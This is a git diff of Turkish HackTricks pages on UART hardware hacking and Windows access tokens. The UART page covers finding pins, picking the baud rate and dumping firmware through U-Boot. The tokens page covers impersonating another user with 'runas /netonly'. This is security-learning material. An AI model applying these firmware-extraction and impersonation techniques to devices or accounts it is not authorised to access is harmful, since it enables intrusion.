* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na(https://github.com/sponsors/carlospolop) göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünleri**](https://peass.creator-spring.com)'ni edinin
|
||||
* [**PEASS Ailesi**](https://opensea.io/collection/the-peass-family)'ni keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
|
||||
- **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
- [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin, özel [**NFT'lerimizi**](https://opensea.io/collection/the-peass-family) görün
|
||||
- **Discord grubuna** 💬 [**katılın**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
|
||||
- **Hacking püf noktalarınızı** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek** paylaşın.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **dark-web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -32,36 +32,36 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
UART, verilerin bileşenler arasında bir bit aynı anda aktarıldığı bir seri protokoldür. Buna karşılık, paralel iletişim protokolleri verileri aynı anda birden fazla kanaldan iletilir. Yaygın seri protokoller arasında RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express ve USB bulunur.
|
||||
|
||||
Genel olarak, UART boşta iken hat yüksek seviyede tutulur (mantıksal 1 değerinde). Daha sonra, veri transferinin başlangıcını belirtmek için verici, alıcıya bir başlangıç biti gönderir, bu sırada sinyal düşük seviyede tutulur (mantıksal 0 değerinde). Daha sonra, verici, gerçek mesajı içeren beş ila sekiz veri biti gönderir, ardından isteğe bağlı bir çiftlik biti ve yapılandırmaya bağlı olarak bir veya iki durdurma biti (mantıksal 1 değerinde) gönderir. Hata denetimi için kullanılan çiftlik biti, uygulamada nadiren görülür. Durdurma biti (veya bitleri) iletimin sonunu belirtir.
|
||||
Genel olarak, UART boşta iken (mantıksal 1 değerinde) hattı yüksek tutar. Daha sonra, veri transferinin başlangıcını belirtmek için verici, alıcıya bir başlangıç biti gönderir, bu sırada sinyal düşük tutulur (mantıksal 0 değerinde). Daha sonra, verici, gerçek mesajı içeren beş ila sekiz veri biti gönderir, ardından isteğe bağlı bir çiftlik biti ve bir veya iki durdurma biti (mantıksal 1 değerinde) gönderir, yapılandırmaya bağlı olarak. Hata denetimi için kullanılan çiftlik biti, uygulamada nadiren görülür. Durdurma biti (veya bitleri), iletimin sonunu belirtir.
|
||||
|
||||
En yaygın yapılandırmayı 8N1 olarak adlandırıyoruz: sekiz veri biti, çiftlik yok ve bir durdurma biti. Örneğin, 8N1 UART yapılandırmasında karakter C'yi veya ASCII'de 0x43'ü göndermek isteseydik, aşağıdaki bitleri gönderirdik: 0 (başlangıç biti); 0, 1, 0, 0, 0, 0, 1, 1 (ikili 0x43 değeri) ve 0 (dur biti).
|
||||
En yaygın yapılandırmayı 8N1 olarak adlandırıyoruz: sekiz veri biti, çiftlik yok ve bir durdurma biti. Örneğin, 8N1 UART yapılandırmasında karakter C'yi veya ASCII'de 0x43'ü göndermek isteseydik, aşağıdaki bitleri gönderirdik: 0 (başlangıç biti); 0, 1, 0, 0, 0, 0, 1, 1 (0x43'ün ikili değeri) ve 0 (dur biti).
|
||||
|
||||
![](<../../.gitbook/assets/image (761).png>)
|
||||
|
||||
UART ile iletişim kurmak için donanım araçları:
|
||||
|
||||
* USB-seri adaptör
|
||||
* CP2102 veya PL2303 yongalarıyla adaptörler
|
||||
* Bus Pirate, Adafruit FT232H, Shikra veya Attify Badge gibi çok amaçlı araçlar gibi
|
||||
- USB-seri adaptör
|
||||
- CP2102 veya PL2303 çipli adaptörler
|
||||
- Bus Pirate, Adafruit FT232H, Shikra veya Attify Badge gibi çok amaçlı araçlar gibi
|
||||
|
||||
### UART Portlarını Tanımlama
|
||||
|
||||
UART'ın 4 portu vardır: **TX**(Gönder), **RX**(Al), **Vcc**(Gerilim) ve **GND**(Toprak). PCB'de **`TX`** ve **`RX`** harflerinin **yazılı olduğu** 4 port bulabilirsiniz. Ancak bir işaret yoksa, bunları bir **multimetre** veya bir **mantık analizörü** kullanarak kendiniz bulmanız gerekebilir.
|
||||
UART'ın 4 portu vardır: **TX**(Gönder), **RX**(Al), **Vcc**(Gerilim) ve **GND**(Toprak). PCB'de **`TX`** ve **`RX`** harflerinin **yazılı olduğu** 4 port bulabilirsiniz. Ancak işaret yoksa, bir **multimetre** veya bir **mantık analizörü** kullanarak kendiniz bulmanız gerekebilir.
|
||||
|
||||
Bir **multimetre** ve cihaz kapalıyken:
|
||||
|
||||
* **GND** pini tanımlamak için **Süreklilik Testi** modunu kullanın, arka ucu toprağa yerleştirin ve kırmızı ucu ile test edin, multimetreden bir ses duyana kadar. PCB'de birkaç GND pini bulunabilir, bu nedenle UART'a ait olanı bulmuş olabilirsiniz veya olmayabilirsiniz.
|
||||
* **VCC portunu** tanımlamak için **DC gerilim modunu** ayarlayın ve 20 V gerilime kadar ayarlayın. Siyah probu toprağa, kırmızı probu pine yerleştirin ve cihazı açın. Multimetre sabit bir 3.3 V veya 5 V gerilim ölçerse, Vcc pini bulmuşsunuz demektir. Başka gerilimler alırsanız, diğer portlarla tekrar deneyin.
|
||||
* **TX** **portunu** tanımlamak için **DC gerilim modunu** 20 V gerilime kadar ayarlayın, siyah probu toprağa, kırmızı probu pine yerleştirin ve cihazı açın. Gerilimin birkaç saniye boyunca dalgalanıp daha sonra Vcc değerinde sabitlendiğini bulursanız, muhtemelen TX portunu bulmuşsunuzdur. Bu, cihazı açarken bazı hata ayıklama verileri gönderdiği içindir.
|
||||
* **RX portu**, diğer 3'e en yakın olanı olacaktır, en düşük gerilim dalgalanması ve tüm UART pinlerinin en düşük genel değerine sahiptir.
|
||||
- **GND** pini tanımlamak için **Süreklilik Testi** modunu kullanın, arka ucu toprağa yerleştirin ve kırmızı ucu ile test edin, multimetreden bir ses duyana kadar. PCB'de birkaç GND pini bulunabilir, bu nedenle UART'a ait olanı bulmuş olabilirsiniz veya olmayabilirsiniz.
|
||||
- **VCC portunu** tanımlamak için **DC gerilim modunu** ayarlayın ve 20 V gerilime kadar ayarlayın. Siyah probu toprağa, kırmızı probu pine yerleştirin. Cihazı açın. Multimetre sabit bir 3.3 V veya 5 V gerilim ölçerse, Vcc pini bulmuşsunuz demektir. Başka gerilimler alırsanız, diğer portlarla tekrar deneyin.
|
||||
- **TX** **portunu** tanımlamak için **DC gerilim modunu** 20 V gerilime kadar ayarlayın, siyah probu toprağa, kırmızı probu pine yerleştirin ve cihazı açın. Gerilimin birkaç saniye boyunca dalgalanıp daha sonra Vcc değerinde sabitlendiğini bulursanız, muhtemelen TX portunu bulmuşsunuz demektir. Bu, cihazı açarken bazı hata ayıklama verileri gönderdiği içindir.
|
||||
- **RX portu**, diğer 3'e en yakın olanı olacaktır, en düşük gerilim dalgalanması ve tüm UART pinlerinin en düşük genel değerine sahiptir.
|
||||
|
||||
TX ve RX portlarını karıştırabilirsiniz ve hiçbir şey olmaz, ancak GND ve VCC portlarını karıştırırsanız devreyi yakabilirsiniz.
|
||||
|
||||
Bazı hedef cihazlarda, üretici tarafından RX veya TX devre dışı bırakılarak UART portu devre dışı bırakılabilir veya ikisi de devre dışı bırakılabilir. Bu durumda, devre kartındaki bağlantıları izleyerek ve bazı ayrılma noktalarını bularak yardımcı olabilir. UART'nin algılanmadığını ve devrenin kırıldığını doğrulamak hakkında güçlü bir ipucu, cihazın garantisini kontrol etmektir. Cihazın bir garanti ile gönderilmiş olması durumunda, üretici bazı hata ayıklama arayüzleri (bu durumda, UART) bırakır ve bu nedenle UART'yi bağlamış ve hata ayıklama yaparken tekrar bağlayacaktır. Bu ayrılma pinleri lehimleme veya jumper tellerle bağlanabilir.
|
||||
Bazı hedef cihazlarda üretici tarafından RX veya TX veya hatta her ikisi devre dışı bırakılarak UART portu devre dışı bırakılabilir. Bu durumda, devre kartındaki bağlantıları izlemek ve bazı kesme noktalarını bulmak faydalı olabilir. UART'nin algılanmadığı ve devrenin kırıldığının doğrulandığı güçlü bir ipucu, cihazın garantiye sahip olup olmadığını kontrol etmektir. Cihazın bazı garanti ile gönderilmiş olması durumunda, üretici bazı hata ayıklama arayüzleri (bu durumda UART) bırakır ve bu nedenle UART'yi bağlamış ve hata ayıklama yaparken tekrar bağlayacaktır. Bu kesme pinleri lehimleme veya jumper tellerle bağlanabilir.
|
||||
|
||||
### UART Baud Oranını Tanımlama
|
||||
|
||||
Doğru baud oranını tanımlamanın en kolay yolu, **TX pini çıkışını incelemek ve veriyi okumaya çalışmaktır**. Aldığınız veri okunabilir değilse, veri okunabilir hale gelene kadar bir sonraki mümkün baud oranına geçin. Bunu yapmak için bir USB-seri adaptör veya Bus Pirate gibi çok amaçlı bir cihaz kullanabilir ve [baudrate.py](https://github.com/devttys0/baudrate/) gibi bir yardımcı betikle eşleştirebilirsiniz. En yaygın baud oranları 9600, 38400, 19200, 57600 ve 115200'dür.
|
||||
Doğru baud oranını tanımlamanın en kolay yolu, **TX pini çıkışını incelemek ve veriyi okumaya çalışmaktır**. Alınan veri okunamıyorsa, veri okunabilir hale gelene kadar bir sonraki mümkün baud oranına geçin. Bunu yapmak için bir USB-seri adaptör veya Bus Pirate gibi çok amaçlı bir cihaz kullanabilir ve [baudrate.py](https://github.com/devttys0/baudrate/) gibi bir yardımcı betikle eşleştirebilirsiniz. En yaygın baud oranları 9600, 38400, 19200, 57600 ve 115200'dür.
|
||||
|
||||
{% hint style="danger" %}
|
||||
Bu protokolde bir cihazın TX'sini diğer cihazın RX'ine bağlamanız gerektiğini unutmamak önemlidir!
|
||||
|
@ -69,7 +69,7 @@ Bu protokolde bir cihazın TX'sini diğer cihazın RX'ine bağlamanız gerektiğ
|
|||
|
||||
## CP210X UART to TTY Adaptörü
|
||||
|
||||
CP210X Yongası, NodeMCU (esp8266 ile) gibi birçok prototip kartında Seri İletişim için kullanılır. Bu adaptörler oldukça ucuzdur ve hedefin UART arabirimine bağlanmak için kullanılabilir. Cihazın 5 pini vardır: 5V, GND, RXD, TXD, 3.3V. Herhangi bir hasar olmaması için hedef tarafından desteklenen gerilimi bağladığınızdan emin olun. Son olarak, Adaptörün RXD pimini hedefin TXD'sine ve Adaptörün TXD pimini hedefin RXD'sine bağlayın.
|
||||
CP210X Çipi, NodeMCU (esp8266 ile) gibi birçok prototip kartında Seri İletişim için kullanılır. Bu adaptörler oldukça ucuzdur ve hedefin UART arabirimine bağlanmak için kullanılabilir. Cihazın 5 pini vardır: 5V, GND, RXD, TXD, 3.3V. Herhangi bir hasarı önlemek için hedef tarafından desteklenen gerilimi bağladığınızdan emin olun. Son olarak, Adaptörün RXD pimini hedefin TXD'sine ve Adaptörün TXD pimini hedefin RXD'sine bağlayın.
|
||||
|
||||
Adaptör algılanmazsa, CP210X sürücülerinin ana sistemde yüklü olduğundan emin olun. Adaptör algılandığında ve bağlandığında, picocom, minicom veya screen gibi araçlar kullanılabilir.
|
||||
|
||||
|
@ -85,11 +85,11 @@ Minicom'i yapılandırmak için aşağıdaki komutu kullanın:
|
|||
```
|
||||
minicom -s
|
||||
```
|
||||
`Seri port ayarları` seçeneğinde baud hızı ve cihaz adı gibi ayarları yapılandırın.
|
||||
`Serial port setup` seçeneğinde baud hızı ve cihaz adı gibi ayarları yapılandırın.
|
||||
|
||||
Yapılandırmadan sonra `minicom` komutunu kullanarak UART Konsolunu başlatın.
|
||||
|
||||
## Arduino UNO R3 Üzerinden UART (Çıkarılabilir Atmel 328p Yonga Kartları)
|
||||
## Arduino UNO R3 Üzerinden UART (Çıkarılabilir Atmel 328p Yongaları)
|
||||
|
||||
UART Seri USB adaptörleri mevcut değilse, Arduino UNO R3 hızlı bir hile ile kullanılabilir. Arduino UNO R3 genellikle her yerde bulunabilir olduğundan, bu yöntem çok zaman kazandırabilir.
|
||||
|
||||
|
@ -99,7 +99,7 @@ Son olarak, UART arayüzüne göre baud hızını ayarlayarak Arduino IDE'yi kul
|
|||
|
||||
## Bus Pirate
|
||||
|
||||
Bu senaryoda, programın tüm çıktılarını Seri Monitöre gönderen Arduino'nun UART iletişimini izleyeceğiz.
|
||||
Bu senaryoda, Arduino'nun programın tüm çıktılarını Seri Monitöre gönderdiği UART iletişimini izleyeceğiz.
|
||||
```bash
|
||||
# Check the modes
|
||||
UART>m
|
||||
|
@ -173,17 +173,17 @@ waiting a few secs to repeat....
|
|||
```
|
||||
## UART Konsolu ile Firmware'in Dump Edilmesi
|
||||
|
||||
UART Konsolu, çalışma zamanı ortamındaki temel firmware ile çalışmanın harika bir yolunu sağlar. Ancak UART Konsolu erişimi salt okunur olduğunda birçok kısıtlama getirebilir. Birçok gömülü cihazda, firmware EEPROM'lerde depolanır ve geçici belleğe sahip işlemcilerde yürütülür. Dolayısıyla, firmware, üretim sırasında EEPROM içindeki orijinal firmware olduğundan ve herhangi yeni dosyalar geçici bellek nedeniyle kaybolacağından salt okunur tutulur. Bu nedenle, gömülü firmware'lerle çalışırken firmware'in dump edilmesi değerli bir çabadır.
|
||||
UART Konsolu, çalışma zamanı ortamındaki temel firmware ile çalışmanın harika bir yolunu sağlar. Ancak UART Konsolu erişimi salt okunur olduğunda birçok kısıtlama getirebilir. Birçok gömülü cihazda, firmware EEPROM'lerde depolanır ve geçici belleğe sahip işlemcilerde yürütülür. Bu nedenle, firmware, üretim sırasında EEPROM içindeki orijinal firmware olduğundan ve herhangi yeni dosyaların geçici bellek nedeniyle kaybolacağından salt okunur olarak tutulur. Bu nedenle, gömülü firmware'lerle çalışırken firmware'in dump edilmesi değerli bir çabadır.
|
||||
|
||||
Bunu yapmanın birçok yolu vardır ve SPI bölümü, çeşitli cihazlarla EEPROM'dan firmware'in doğrudan çıkarılma yöntemlerini kapsar. Bununla birlikte, fiziksel cihazlar ve harici etkileşimlerle firmware'in dump edilmesini ilk denemeden önce UART ile yapmayı önerilir.
|
||||
|
||||
UART Konsolundan firmware dump etmek, öncelikle bootloader'lara erişim sağlamayı gerektirir. Birçok popüler satıcı, Linux'u yüklemek için <b>uboot</b> (Universal Bootloader) kullanır. Bu nedenle, <b>uboot</b>'a erişim sağlamak gereklidir.
|
||||
UART Konsolundan firmware dump etmek, öncelikle bootloader'lara erişim sağlamayı gerektirir. Birçok popüler satıcı, Linux'u yüklemek için <b>uboot</b> (Universal Bootloader) kullanır. Bu nedenle, <b>uboot</b>'a erişmek gereklidir.
|
||||
|
||||
<b>Boot</b> bootloader'a erişmek için UART portunu bilgisayara bağlayın ve herhangi bir Seri Konsol aracını kullanın ve cihazın güç kaynağını bağlı olmaktan çıkarın. Kurulum hazır olduğunda Enter tuşuna basılı tutun. Son olarak, cihazın güç kaynağını bağlayın ve başlatın.
|
||||
<b>Boot</b> bootloader'ına erişmek için UART portunu bilgisayara bağlayın ve herhangi bir Seri Konsol aracını kullanın ve cihaza güç kaynağını bağlı olmadan tutun. Kurulum hazır olduğunda Enter tuşuna basılı tutun. Son olarak, cihaza güç kaynağını bağlayın ve başlatın.
|
||||
|
||||
Bunu yapmak, <b>uboot</b>'un yüklenmesini kesintiye uğratacak ve bir menü sağlayacaktır. <b>uboot</b> komutlarını anlamak ve bunları listelemek için yardım menüsünü kullanmanız önerilir. Bu muhtemelen `help` komutudur. Farklı satıcılar farklı yapılandırmaları kullandıklarından, her birini ayrı ayrı anlamak gereklidir.
|
||||
|
||||
Genellikle, firmware'i dump etmek için kullanılan komut:
|
||||
Genellikle, firmware'i dump etmek için komut şudur:
|
||||
```
|
||||
md
|
||||
```
|
||||
|
@ -193,18 +193,18 @@ Son olarak, günlük dosyasından gereksiz tüm verileri çıkarın ve dosyayı
|
|||
```
|
||||
binwalk -e <filename.rom>
|
||||
```
|
||||
Bu, EEPROM'daki olası içerikleri, hex dosyasında bulunan imzalara göre listeleyecektir.
|
||||
Bu, EEPROM'dan olası içerikleri HEX dosyasında bulunan imzalara göre listeleyecektir.
|
||||
|
||||
Ancak, kullanılsa bile <b>uboot</b>'un her zaman kilidinin açık olmadığını belirtmek gerekir. Enter tuşu bir şey yapmıyorsa, Boşluk Tuşu gibi farklı tuşları kontrol edin. Önyükleyicinin kilitli olup kesintiye uğramadığı durumlarda bu yöntem çalışmayabilir. Cihaz için <b>uboot</b>'un önyükleyici olup olmadığını kontrol etmek için, cihazın önyükleme sırasında UART Konsolundaki çıktıyı kontrol edin. Önyükleme sırasında <b>uboot</b> ifadesinin geçtiğini görebilirsiniz.
|
||||
Ancak, kullanılsa bile <b>uboot</b>'un her zaman kilidinin açık olmadığını belirtmek gerekir. Enter tuşu bir şey yapmıyorsa, Boşluk Tuşu gibi farklı tuşları kontrol edin. Önyükleyicinin kilitli olduğu ve kesintiye uğramadığı durumlarda bu yöntem çalışmayacaktır. Cihaz için <b>uboot</b>'un önyükleyici olup olmadığını kontrol etmek için cihazın önyükleme sırasında UART Konsolundaki çıktıyı kontrol edin. Önyükleme sırasında <b>uboot</b> bahsedilebilir.
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için ücretsiz işlevler sunan **karanlık ağ** destekli bir arama motorudur.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve **ücretsiz** olarak motorlarını deneyebilirsiniz:
|
||||
|
||||
|
@ -220,7 +220,7 @@ HackTricks'ı desteklemenin diğer yolları:
|
|||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) katılın veya [telegram grubuna](https://t.me/peass) katılın veya bizi Twitter'da** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) katılın veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,21 +2,21 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
* **Bir siber güvenlik şirketinde mi çalışıyorsunuz? Şirketinizin HackTricks'te reklamını görmek ister misiniz? ya da PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz? [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* **Bir siber güvenlik şirketinde mi çalışıyorsunuz?** **Şirketinizi HackTricks'te reklamını görmek ister misiniz?** ya da **PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz?** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya beni **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**'da takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek PR'ler oluşturarak** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ve** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **paylaşın.**
|
||||
* **Katılın** [**💬**](https://emojipedia.org/speech-balloon/) **Discord grubuna**](https://discord.gg/hRep4RUj7f) veya **telegram grubuna** veya **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**'u takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ve** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **ile paylaşın.**
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve **şirketin veya müşterilerinin** **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
|
@ -28,7 +28,7 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
## Erişim Jetonları
|
||||
|
||||
**Sisteme giriş yapan her kullanıcı**, o oturum için güvenlik bilgileri içeren bir erişim jetonuna sahiptir. Kullanıcı oturum açtığında sistem bir erişim jetonu oluşturur. **Kullanıcı adına yürütülen her işlem**, erişim jetonunun bir kopyasına sahiptir. Jeton, kullanıcıyı, kullanıcının gruplarını ve kullanıcının ayrıcalıklarını tanımlar. Bir jeton ayrıca, mevcut oturumu tanımlayan bir oturum açma SID'si (Güvenlik Kimliği) içerir.
|
||||
**Sisteme giriş yapan her kullanıcı**, o oturum için **güvenlik bilgileri içeren bir erişim jetonuna sahiptir**. Kullanıcı oturum açtığında sistem bir erişim jetonu oluşturur. **Kullanıcı adına yürütülen her işlem**, erişim jetonunun bir kopyasına sahiptir. Jeton, kullanıcıyı, kullanıcının gruplarını ve kullanıcının ayrıcalıklarını tanımlar. Bir jeton ayrıca, mevcut oturumu tanımlayan bir oturum açma SID'si (Güvenlik Tanımlayıcı) içerir.
|
||||
|
||||
Bu bilgileri `whoami /all` komutunu çalıştırarak görebilirsiniz.
|
||||
```
|
||||
|
@ -74,30 +74,25 @@ SeUndockPrivilege Remove computer from docking station Disabled
|
|||
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
|
||||
SeTimeZonePrivilege Change the time zone Disabled
|
||||
```
|
||||
### Yerel yönetici
|
||||
### Erişim belgeleri kullanıcı kimliği taklit
|
||||
|
||||
Bir yerel yönetici oturum açtığında, **iki erişim belirteci oluşturulur**: Bir tanesi yönetici haklarına sahipken diğeri normal haklara sahiptir. **Varsayılan olarak**, bu kullanıcı bir işlemi yürüttüğünde **normal** (yönetici olmayan) **haklara sahip olan kullanılır**. Bu kullanıcı bir şeyi **yönetici olarak yürütmeye çalıştığında** ("Yönetici olarak çalıştır" örneğin) **UAC** izni için sorulacaktır.\
|
||||
Eğer [**UAC hakkında daha fazla bilgi edinmek istiyorsanız bu sayfayı okuyun**](../authentication-credentials-uac-and-efs/#uac)**.**
|
||||
|
||||
### Kimlik kullanıcı taklidi
|
||||
|
||||
Eğer **başka bir kullanıcının geçerli kimlik bilgilerine sahipseniz**, bu kimlik bilgileriyle bir **yeni oturum açma oturumu oluşturabilirsiniz**:
|
||||
Eğer başka bir kullanıcının geçerli erişim belgelerine sahipseniz, bu kimlik bilgileriyle yeni bir oturum açma oturumu oluşturabilirsiniz:
|
||||
```
|
||||
runas /user:domain\username cmd.exe
|
||||
```
|
||||
**Erişim belirteci**, aynı zamanda **LSASS** içindeki oturumların bir **referansını** da içerir, bu işlem ağdaki bazı nesnelere erişmesi gerektiğinde faydalıdır.\
|
||||
Ağ hizmetlerine erişmek için **farklı kimlik bilgileri kullanan bir işlem başlatabilirsiniz**.
|
||||
**Erişim belirteci**, aynı zamanda **LSASS** içindeki oturumların bir **referansını** da içerir, bu, işlemin ağdaki bazı nesnelere erişmesi gerekiyorsa faydalıdır.\
|
||||
Ağ hizmetlerine erişmek için farklı kimlik bilgileri kullanan bir işlem başlatabilirsiniz:
|
||||
```
|
||||
runas /user:domain\username /netonly cmd.exe
|
||||
```
|
||||
Bu, ağdaki nesnelere erişmek için kullanışlı kimlik bilgileriniz varsa ancak bu kimlik bilgileri geçerli ana makinede geçerli değilse (çünkü yalnızca ağda kullanılacaklar), kullanışlıdır (mevcut ana makinede mevcut kullanıcı ayrıcalıkları kullanılacaktır).
|
||||
Bu, ağdaki nesnelere erişmek için kullanışlı kimlik bilgileriniz varsa ancak bu kimlik bilgileri yalnızca ağda kullanılacak şekilde geçerli değilse (mevcut ana bilgisayarda mevcut kullanıcı ayrıcalıkları kullanılacaktır).
|
||||
|
||||
### Kimlik Bilgilerinin Türleri
|
||||
|
||||
Mevcut iki tür kimlik bilgisi vardır:
|
||||
|
||||
* **Birincil Kimlik Bilgisi**: Bir işlemin güvenlik kimlik bilgilerinin bir temsili olarak hizmet eder. Birincil kimlik bilgisinin oluşturulması ve işlemlerle ilişkilendirilmesi, ayrıcalık ayrımı ilkesini vurgulayan yükseltilmiş ayrıcalıklar gerektiren eylemlerdir. Genellikle, bir kimlik doğrulama servisi kimlik bilgisi oluştururken, bir oturum açma servisi kullanıcının işletim sistemi kabuğuyla ilişkilendirir. İşlemlerin oluşturulduğunda, işlemler ebeveyn işleminin birincil kimlik bilgisini devralırlar.
|
||||
